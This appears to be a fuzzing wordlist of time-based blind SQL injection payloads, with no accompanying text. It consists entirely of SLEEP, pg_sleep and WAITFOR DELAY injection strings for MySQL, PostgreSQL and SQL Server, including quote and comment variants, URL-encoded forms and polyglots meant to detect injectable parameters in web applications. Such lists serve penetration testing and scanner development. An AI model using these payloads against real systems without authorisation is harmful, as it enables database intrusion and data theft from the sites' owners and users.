" or pg_sleep(5)--
" or sleep(5)#
" or sleep(5)="
") or pg_sleep(5)--
") or sleep(5)="
")) or pg_sleep(5)--
")) or sleep(5)="
"));waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
&&SLEEP(5)
&&SLEEP(5)#
&&SLEEP(5)--
' AnD SLEEP(5) ANd '1
' or pg_sleep(5)--
' or sleep(5)#
' or sleep(5)='
'&&SLEEP(5)&&'1
') or pg_sleep(5)--
') or sleep(5)='
')) or pg_sleep(5)--
')) or sleep(5)='
'));waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
));waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
+ SLEEP(10) + '
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
1 or pg_sleep(5)--
1 or sleep(5)#
1) or pg_sleep(5)--
1) or sleep(5)#
1)) or pg_sleep(5)--
1)) or sleep(5)#
;waitfor delay '0:0:5'--
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AnD SLEEP(5)
AnD SLEEP(5)#
AnD SLEEP(5)--
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
or pg_SLEEP(5)
or pg_SLEEP(5)#
or pg_SLEEP(5)--
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
pg_sleep(5)--
sleep(5)#
waitfor delay '00:00:05'
waitfor delay '00:00:05'#
waitfor delay '00:00:05'--
or sleep 5 —-
or sleep 5
or sleep(5) —-
or sleep(5)
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5) —-
1 or pg_sleep(5) --
“ or pg_sleep(5) --
‘ or pg_sleep(5) --
1) or pg_sleep(5) --
;waitfor delay ‘0:0:5’ —-
‘;WAITFOR DELAY ‘0:0:5’ —-
);waitfor delay ‘0:0:5’ —-
‘;waitfor delay ‘0:0:5’ —-
“;waitfor delay ‘0:0:5’ —-
‘);waitfor delay ‘0:0:5’ —-
“);waitfor delay ‘0:0:5’ —-
));waitfor delay ‘0:0:5’ —-
‘));waitfor delay ‘0:0:5’ —-
“));waitfor delay ‘0:0:5’ —-
“) IF (1=1) WAITFOR DELAY ‘0:0:5’ --
‘;%5waitfor%5delay%5’0:0:5'%5 -- %5
‘ WAITFOR DELAY ‘0:0:5’ —-
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
';%20waitfor%20delay%20'0:0:6'%20--%20
') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
if(now()=sysdate(),sleep(20),0)
132'; waitfor delay '0:0:6' -- 
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
